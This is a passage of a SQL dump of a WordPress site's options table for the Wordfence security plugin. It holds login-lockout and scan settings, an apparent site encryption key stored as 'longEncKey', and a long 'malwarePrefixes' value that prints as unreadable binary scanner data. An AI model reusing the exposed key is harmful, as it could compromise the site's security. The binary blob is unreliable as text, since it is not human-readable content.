23rd August @ 09:52:26PM\";s:2:\"IP\";s:13:\"103.70.171.77\";}','yes'),('lastAttackDataSendId','1020','yes'),('lastAttackDataSendTime','1629499511.893720','yes'),('lastBlockAggregation','1629627776','yes'),('lastBruteForceDataSendTime','1624384938.556203','yes'),('lastDailyCron','1629713822','yes'),('lastDashboardCheck','1629713822','yes'),('lastEmailHash','1629757065:7460adb367c4359efc005364c10e5d73','yes'),('lastFalsePositiveSendTime','1624494377','yes'),('lastNotificationID','216','no'),('lastPermissionsTemplateCheck','1629714132','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1629513635','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','111f9d8deffdc7e06b433d13cf92f3c6b765abe1d90c81dded6b6799a6bd5f08','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_<	-��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R	�,�	5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L��	�\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k	_�\r?~��ʷ̀�#G@�C�w�C\'�_�	���	�YЉ�[�����*�Z�j}	�B��CE�T�9*�>*�	Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/	t�	UM_U�q��n]]M�B�G�k	��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�׮ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r��	u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(�	����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k	�|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q�	��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U	�����\r��K�a�����g\r���\0^Yp�	ژÁk���\Z��`>޸^=���E������}A�a�p�[���mሳY����p��y1	����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g�	gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p����	\"\n>�p>�>��	������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub�������	�%Ґ�u}��\\d��aȤc+{{	2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^����	2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ��	�R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ	\\�	����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G�	)X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��޻������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3����	�_p�o�������(��\'\nu���:	E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N޲�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{	�S��΍[��뚌�|�.0��z� �{�zT�.�=\r�ђ�>�E�o���6����[r�k�DW4�E����������Е���+=�+�`te�>��ڄ�JnD����գo��/;�!cס�ޛѰ\'4|G,\Z��]k�]?�-�!x��\ZI8����\'�E7��\Z�i.B7��E7���/1hlc9�5e\Z�*G_�	�S��_���/��[Sѝ�5h�Lc4����%Cw���nE\r��>�}��7n�o����5��wM1�@S�mBS�X���BS���G��Ѵ}Uh��z0V�f�|�f��@3�բ�l|��#���\nѬ1uh֭�hV�4g��M@s�\"М�X4�e(��a$z�d4����-�E����(F󲖡�3t�|��h~�4��=qFO��CO�m@X-ЎEƬCN�FO��BO{FO�?��$�%������Z�B�0�L�\rZ�t-�u-+�������G/�e�W�����\\��޷�U���U���aNh5���rF�+��k�k%��{��k_����X�z�bZk�֮qBoR����^���z�v�(�Κ����}��}Wz?&\0}([�>\\��>�h�I��a�6��G���h�m�T�>��G��u�S���3}Vb��씢-���w�G��9���z���Or\"��5}5�}e݇�Z�}�}=�	}=���Q(�nrm��\Zmc��OtE���D?��G;l�G/�c���,�v�}B?�߃~�<�\Z�~i�F�jMF��_D��F���F��\rh���u���ȣݣ���C��s�ў���/�ץ��F�t�B�����C�!S�T�o֍�G�@�3�����\0R���O0�\Z����cX{������_~?\r#�]0��;��v�D�yLl���}�0�lLb`�I��b��w1ن����Q�y�qS\Z�ĸ32�/?��j�b��N�z�-L}�S��a��S��O�5����i�b�U�0��	��Ssl�n�{ Ӄ0��?1��W���I���H���SlhB\"6,~\r6�[fZ�\r�/��_����*�F����[�O��5���/���� ̴&c��/k�{�663\Z[�g��T�Y�,�1��l��Ll|�-6a�	f3�/f3�f˿�l�1ۨ��������$�6��6i���Y�MY�M)��9�a�m���a7���C�i�6�;�2s�Ha�?����،#��Y5 �&�ܨc��n̝s���gbs�+������ߞؼ�7ؼo?��6�q)�\0��-h��<�as�1��=����g�R����[�S�y��Ńa�������%?�`>�K�e��a�&]���b+z���!�����tލ�|5|q|{[5e4���:��\\��g$Bta!�����X����L�ª�`�g���ᳱ�uغ��u�؆ǽ؆g�\r_���]�X��X��Xtq>��܄m��m�mN8�m>t��۲��=����Ƕf����Z��I\rX�x�p=��K���m��a�U��*����x;K�%ݷ�v��Œ�Yl����b��plϔ5؞��ؾ���Ik��LK=i���.�\'`��ð���X�����4,3x\rvh���찏?�e�˺n�e�b�i4�c܃��;�N��-�Ž�:���c����<t�\'��婶byw\r�|h!v�;	��N���?�\nDc��-��t�`E�qX�u.�&�3��ؙ�u���,V�JNJ���-!Xɡ�XI�e�\\�F�t�9���+���J�i��꿼%��D��u��!%V������*n�*���KZ�إo[��z�ؕ/Xe�n��;�]�f��?n`�mO�k\'7b�\rcח�b�o.���\r�jb��={����\r�U�\r�c؍;؍�X-7\r�}������	�]=����!��:�Z����%��ѵX��9X�%�5B_�\'�]Xs�%�lt�,<k�V���2�Z��X�3����b���c/Wb//Ea��-��0[��7�w�����g�}o���>��ľ*����X��j�+{2�]���,�~G��ҰQY�/,��\\������vZ����?N����#���H�o�B������,��܇;q�������\0G<�q\\�\'M\'��q�	\\rk.��ҟSq��hj�Y�h��ӊs��qu�F\\(݂kt��\Zc�m��k߶�5�:��:�p�\rJ|��>d�5>d�[\\�R���z۾�z{�p��6�~�]���i���B|��>��V��Gtō��q~n��nrt=>*�<>�D%>��M���O�t`�]���8��ռ�͇|��m���,n�m�[���؄p|l�;|z\n�<����Oŭn���u���=��w8�v��\'T��mln�6�z���[�M�-n�	����]7�v�zp�w�����`k|J�O�?w[�;M���;Mq�#\r�Ԙd|jZ��݅O���;��]��K�>�0�n������0�g��g�E��\0O|Vw%>;�\Z>��7�n����,>��5��>_�e/����y���[�/�؏/|�\n_�q�z�{u�^\Z��0�vƽ/V�>ǃq�O���K�R�6|��2�����\n�)���S���kp�\'^�ʐ�x >_�%_�5z�	�i��^p_�p4:���}_�����ã��Oj�{3�O��u���:u:�a�y|��	x�uxd�<�xYa�G��7\ZN�7޿�Gs���?1�&�5x��g<&��y�\Z�i��o��|��ee4���6|��qx�j|���zi(�m	�����^��4���t<���a<�6|G�G<�5�s�|g[%�����;O�u��W��2��:��2�h���5|/��ﻢ��?�O	��Sҏ�Z��TO-����xz�&��~~0x%�1E�g,��3��	����OxfC<~ȁ�-X�d���jO��/�ŏx�ŏ\\{�y4�E��5�۞�� ��ʇ�ɠ9��T/?/�Z�\\?����৭��wO�O�i���Ow�ƋػxQ��]n����b�\"�x�m�������a_���e�y�?~��?�	~��+�|\"�_��_v��_�	Ư,}�Wj���V�U%3�x���x��>�:�~��=~m�0��yc���[���j���\\���8�51���9,~SӉߜ��o�෿X�w5;�C��s����Cx�pk���!~��o���P��,8� ��8���e.x�*o��𦵾x�f�i��T��7ݚ�7�1��,�X�?��?�؅��:��l��7�[���/q�_�����x��u�-���N\0��q��ױ��q)��t[W���.�ߗ<���?<�;|�Y��m���z/�϶3��gS�/M�g7�_{,�o��o���k��]�\Z���.�gw6�ê�q���f���k�{7xo�a�\'i��������]����>Պ�~х����?&[��߁�x_���;�*@��1�_������r|��A�_G��0Մ\0K)zw�@�?��@v�����0���N?�B�h�04\'�-0!���$d)�Ur��w$�&;�Cl�g��7��p]����|	>b/���*^�Pe��0�0�y}��\Z�Ch%7ڃf���_w����`b\"1x�b�h11DaC�}%�\ZD,aP3�Z��VSE�	\"�� ��;N�x�K�$�#i[b�H#���C�x�U�Dv�01�!F�F�ѫ>��i�Hb��EbLT\'a��DX�{NX|�N��~B�������|K�/��y\"a9O��|�OX~]IX�|$���񖫉	��	���	�/1��a����A�})%�	��΄��nbʃ/Ĕv�C�%��IL�wS��SW�N6���#�ӷQĴ�	g�넳�+�\\H�\'\\FU.%,��1#p=1h&f��E�\"�Y\'r	7�I�۳�ۛ��ɀp�v\"܏%�	Ĝ���pb����T�[���	�6�S/��t]Nx��$�����/�c����X<=�XbA,~����J,��$|�W��|���X*�#�f� ��K��K��\"�t��;	�\"�)�X9d\Z�.�l�H�k�5ïk�̈5���	�D�R#\"���$��fO��� �R�:v��XKl�\\DD�WQ?k��E-Ħ�@bAl�>Nl�2��]1��ݿ��Zt�ضÜ��N�=o&����׉���D��ED�d5�4̄H:<�؅�&v�F�#��ݏ�=6��=������SL�\'܈�+܉��ډ�)=D�c��6�8��8p�-q�L�f��H��D��F���#������yDz�a��Տ�!��8dHr�\'�`k\"�4��i��#�e�������ܡ���\'��Z�������o�D�f��s��_<�8��DdcD���#DѴ�D���(\n<Ou�g�AD�K�(u\\B��O��7[�O�\'.��&.�ڏe��D���WJ���r\'����(?���辒�X�M\\|򕨨�\'.�!�*�)Q��Quh(Q�����d��`F�W7�\\��p	Q{ً�9}q�&��ekEܺB�>����BM�gN�Y�O܉xCܩ_A���M�cN�\'�Mk���)�}���w�r)�`�\n�⡍-�oQ����7��oL&\Z��DC�\"�Q�;�Ԛh|YL<Y�A<�I<� %��!�-̈gCY��9k�e�q�%-�xA���@��$���xx�x�y���������O|\\F�D����ԽEt.J|�6#>��Ӵ�o�i�7�l�KGt��\'�|���Ӊ��w���3D�H�@������op�G񻦛�����ӫE��{}?~�ӟ��S��>1�p�x.%��/H�� a�h.V���Z� 1q���#q��/�AGW���s$	���9�8����6�r�S$�֏��= B8I?�#�3��?�d\Z�Hvh)ɾB��y$簞�X�\\i3�:�T��!�)<�Oj�=!5N�Z�$R�\r�5�9�ZI�\Z��މ���$��/�%���\"\rRQ� ݚ4�+\'�-�A��HC>�4�O���}\Z9b�r��Nrd�0r�!���i��I��i|c:i|k7iž\"M�F�&��H�2\'�<si�֑c\'_%ǥ+I�ѣH+�Xr�d9^J���K�lYO�6&m�� mg����oH�5���D9�UM:�yI:��%1�q;HN�YDN�%���MN��FN˯#�w�Ω^��KN�I׳��W�I���Hw�c�{S���#i&�LyD�)�Nέa�y��<��g���4ҳ���d��ą\\d�D.*\'��<H�䳤ס�����}�b߿����g�Z�W�N��!}����c�ҵɥ	{ȥ?-�eeKI?ă\\fN.�@��C��N�hM\'�]�ɀ�ɕO�����:r��䪿��`�?�j#sr\r�B��\r C\"2��w2�ʜ���᧋��2\"4��(|L��/%�>�&ו��u���G�Lf�>O##GF��n�dd/FF�S�(�K��u�ȍ1��h�2:y4�	�#7��Jn��On*~Fn�lDƬLƴ-\'7�;DnNYOƙ�\"�m$J��č�d�ǟ�5�ɤ_dR�7�3$���d�dr׶Nr7���#&�ɳ��B���d���-�Εd�=r��9�)���@f�U�Y��dV+��n\'�S��<�RF���c/=�\\��\r�K�^}H�E���k:O�˴�N\n�d�+Y�$Rk���#�Ӽ-y�D\ZY�� ��~&�<�!�-F��`#�ynZ\"y�Y��C^�M!/�m\'�&\'˶=\'�l����r�J�<|-Y~�=y1MNV���KZ:䥩/�J�Gd��=y�`y��Y=�5Y��IV�o!��:�\"%y��X�f�+YS�Jֺe�7�N�7�k�[����M��<$��{K>pJ\'\\t ���Cc���ai���U��{1�8M�l�-&�n�M����.���K��o{�\'kޓO=��fY*�l�O6O� �Wo!��z�g���g���g_Ed˟���R;�����6d��5��|S��|�=�|;��|��|[��n�!��\'ۯƐ����k��5=����ò���0���QD~6?D~��N~9���RJ~[�����]�F��x�]�Mv?u&{r��^��h�_�J�W=@���D�b�?-ɿV{Ⱦɿ�~����(���ˆ��=\"p�U�R.��d��m\"TvPDL��>\"���Hlc.�z+{��k(�|�8���Q�X�F�xK�h�\"fZ���u��oD����\"���\"��f���ע!;4�!�BD��H�ޝ_\"�g�\"����a�\rE�G&�F:o;���/2~�/\Z�A4vm�hܰѢqwA�xH\"\Z?\\#�6�!��<Ed\',��M��M.s9��\"G��\"ǖ]���Ѵ3�E��D.������D3�D�f���.�#ro=&���,�;s�hޠ��yCψ�r�yg�<NOyt��Z�-�(ZT����gh��oF�|2)�O��ȧm���c�h���o������h�\\sъ�?\"���7E+�lD+?��c�EAC/��T�¾6��o.�w����\'Z{�V����hCP�hC�ц*R���^ѦnGQL�B�9��h��x�(��B�x��(	>+��yR���H���h�����4����D)!٢����W���Nj����sg�>>/�0_+���-�x�&:4�Ht(c�(�B�(�)T�#d��HmDGM\rEG�:DG�>�r���n!:��(��Q�;щ(mQ�h��p�ZQѲ����zQQ�P�����	��k�D��D���JF�J�f�΋D�D*kEe�V�ʂD凵E�gBD�3E��DWf�U&鋮n�U��D׮�]��Pt�n��F�#���,��Ɖn~��28.��݉4�Y������E��Q��vQC�R�h�OQ�讨)�X�T0A�8K*z�q5+5\'E/b�E/�^�NX.jm�,zy^�z�,j��)z3h��M��[�\n�;�4Qǖ���D���>/[(������BїD��䑢�g�E����E]��D�7x�����(����o�}Q�&��߃6ѿ��b�J,F&U�Q�1��(&���]bQ��X�%K��˶��eّb�l�X��],�8-��2��X1�\\�?��=ż�\"��d�X��F���V���G�����JT<t�5�P�	bC�C<|��xD�\\�����#{x�Q�\r��c�Y�V�Y���j��ت�C<��N��Ubk�Pl�Tl�$���X<�/Wl��J<�@�?�S�;��z�b�6b����O��.�����e�l�t�f��`�ص�P<kU�xֳ/b�=b���b��$�����9���]k��T�=�b���ۗ��-^��P���K��Fk��E��K;։����W�m���A�_�)����Ł+~�WI�ūj����8��tD�Cg���4��έ���fq�u�x����M�v�M���c�q���x��\\����-���qjSq<tC��$�|��	�����\Z���wz4��K��{!�ޖ.�ޟ�ũQ��j�i���Ӓ��kO�>Jg�gi����֟�#마�w_��>�]\\,>�(.���*>e(.{G\\ء�9���nr�nĥo։�ƒ���C�/�}W*Wĉ/{�/o._��#�R�+�ڔ ��;!��m-��H|��qq����V���[Cķ���w�n�9�U|w�����(~��P��%~�c����hq�%\'n�w7�M7|�7\n�ō[�M�:�\'���`q���[��73�/���_4:�_������ŭ��6�G�-���Ƈů���7���M��;�������i����x��+ğx����)��kş������d��o���[]w�V�{��{>6�l���?:ſ�X��&��AK�������\Z$��r	�.���K��%x�c	��XB> !Z7HHi���X\"\"~HD�$�[�%bm=���(�]�0A\n	{�O�r�(Q�s���� ����d�\"�d�2�dІ\'��F��Ɲ�x[�n�6�^��D� ������]%C?���[\"1<m.No������sIb�{Eb����X2ꌣdT�Q�h���d�d����%��=��������$�G;I&��Jl�^�M�����l�]�3�}��d���ွ�q�\'�T#B2��L�4<N�t��ĩa�dZ���Y�Ĺ����dF,���df�nɬk	�I.���wK�`$�d��$~C����J�GU�d�?�b�g����$�KgH�_6K��I��DI��<#Y�<X�$�[��+�Z%Y�͐��!�o��Lϑ�8IV���\\�J�n���\'Yg+	z\Z(	zM�fe�d�뽒5?�%!��%a�֒��$I��{��G%�Iă\n�Z�,ɺ�	�h|�d�\0I6�����x\"�um�l��J�^m�l�+I�&�iGHv��K�O�H�x{H���\"�;��do�	���%��J�ǙHR}�HL���͐��}-�P�K2I��r�l��$��Q���Prt�Xrt�b���L��WI�\\�e�ܽ��ŀ$�i�	}7ɉ�풂�S�S�HNeސ�:�Lr��!�ٙ�$�>�I��%�n�$�>*I��U���%e+�$e]��\n�T��\\��_R��Hrm���^�[�o%wxS���%u�:�5��]�{�s%�v~���X�w��Q�9I�%��vђ�ےg�%�#s%ϯ�H^� y��K�b�Iɋ��ˣ�����%��\r��ݳ��=씼��,y��I�ﳔ|0�|�^J>Ŭ�|�WK>7��|���|��&��3H�m�Hɷ�c���$�o��tk�Jz�T��;��3K%?�GI~<(��m+�*xzI\n٭�BSl�0u]���I	i�T$K��O$KeC����R��ER�/I�^���\\��;-՚(�ZuK�m�X:\"w�tD�?�ȩ��#�äF�¥&`�t�K:J�!5�t̆*��k�f���f�{������R��/�.W�wJǎ����I:6�P:��Uj͍��$��ڴ�Img���6<���H��v߂��F�K\'���ڏ�#�V,���J���S-B�S[�J�fܗ:e�N��i���\r����Jg�:*u�v��礳����G���q�)��TJ88K=��)C�-FH��̥�O�R�d�Ի�O���)�m,]v8P�\'�����)���&�K�-��\Z�����0Ĥ����U�6K��Z���&i��9i�����\"i�{�4DV#\r�,\r�JCu�IC#>H�^n��u������F\Z}�F:�ҨS�1�^I7�I�Mɔ���҄�;&H���&WJw��.���]���]�\"��m�I�?ɔ����\\���֔J�W�K3�͐��fՌ�fߴ�u� =z���w�I]\\z��3i�*=5��l��l}�����ܺ��򃷤cii\'�T�-��TZ�&���!��\'�޻Kz����փ���f��;K}�u�qҺ��{p��ޥp�a��N���f��G+\"��5Q�ƺ�Ҧ	��\'sNJ��ߔ>��Q�����i�%i���疑��ofH_z�Iێ�J_[����%}kH�v�K̗߭���~� �ؽM�y%B�i�Z�Y�K��6X�ua���?��T��{�ni��_Ү\"�eC��i�Fߕ��/��*�!�Gڏ�G������/2�J�~<H������e�3s~AK&�I����D\\.���eҀ-2�i�L~P��R/�ϥʘrL�bd�K��u?.c�ۗ3d�O��q�2�v�L���L;v�lP�t���8�`t�lpc�L7�L�j��l�lh���0�D6����V��x�M�	rG6�5��>����$35��>��=L�Y=�#[�,w�Zf���	JG���p���|�}�h��|�lJ�\'�c�H6m��l�I��u��l�e���d�*@�[�B�<�D6y,���$�?>L6�\'E��F�9�X��Z�0��{�v�w�6��b��H��\Z �ÿ��ɖo�+�m���_���<�d�\rͲ����gd�dk�:�uK�dd��?e3�e�;ɢɢO��6�.�Ŭ�/۲u�,�0Y��(�v�]g,�\'�e	#�e	˶{x����wN��D�T�K��]���R�g�z��a�d{�\ne�}���)�����.;��Bv� ;X�\";X7D��;L��\'Yv�=U���#9��cV~�c{]e������>���e��e����\n�<��ܕ��&;c�(+���\\ ;7���gmم�0Y�����	��K��s�Wv�.Pvœ�U��ɮ��j���n���z�dw�\'�ꂞ���Z���e�������ϔ=l� {<�]�Dy[�,�)k�t�=KY\"k!\\e-�]��Ke��!�K�쥱��e -{�Y��<B�x��SZ�&�Q־��Cg��Cv]�IY.�l�%��V.���.�v{����%��kd��rd�}5�?E�������oe����]2��7|�\r��F�n�-G�F�Q�09N����p9~�RN�,\'~-��n����E����%��\\j��e���yrqGNXȕ��l�69{\\-�I7�`\"�>��k�W�5��u��N�x���9r�{����A��ܰ�|��-��#o}�M��s��&���G�d�M���M�5�MK���j�f?7��\'Q��e,�J��[�g�\'x�[w��m���,�O���r�1���/*w:yL��q@>m�E�����*����rW�?��9r��k�s��sNF�����{��/�\Z*_�tY����[�ܣ\'H�b�ܳ�H�(E_�(s��˾@�u�Z��{��K>��/�5Zx�A|�B|�|�]N�&}�<��7y��9y��#y���<\"�|��y�n�|�LG�Q1J�q�<:I_� �4w�|��t��?�|�X��~�<n�yy��v��Hyr��|ׂ��]���7�����4��u��Sޥ�S%�򃋶�ź˳�˳o�g�~(�>�[���<��H��0C~<����O���G��M�E�c�E/��+K�g����ɋ\rS�%������ez��\"/G~i����xye�y��iyu�b�����\Z�&�͆J�́��[�\n��6���C��|��ߖ�]�?�a*onʛ�C�M5�gf��g�_�[�Y��e��m����-��W��ۻX��;��C3��U��-i�OZ��O˝����?}��Y>X��4#��4Z����\0 ��З�z��ޝ��?����*�{�O�W�.�ם.�=Ae��J!�\\\n��P�P\n_D�/P�h=�|�\"��Q��)�Ŕ8`<%��$�!J�XJ�l�)ٵ����9Jn6@��\r�(AQ��)��H���G�Q����S����ӧ����C�(.�ŵ�P���R�\\K��#(M�bJ˚����(�7���M�X�RC�PC�\\��<�N�θB�}�I�3�)}�`�\0~F���SC��Q�RjX�=j�/k�0{65��5�b5�Q 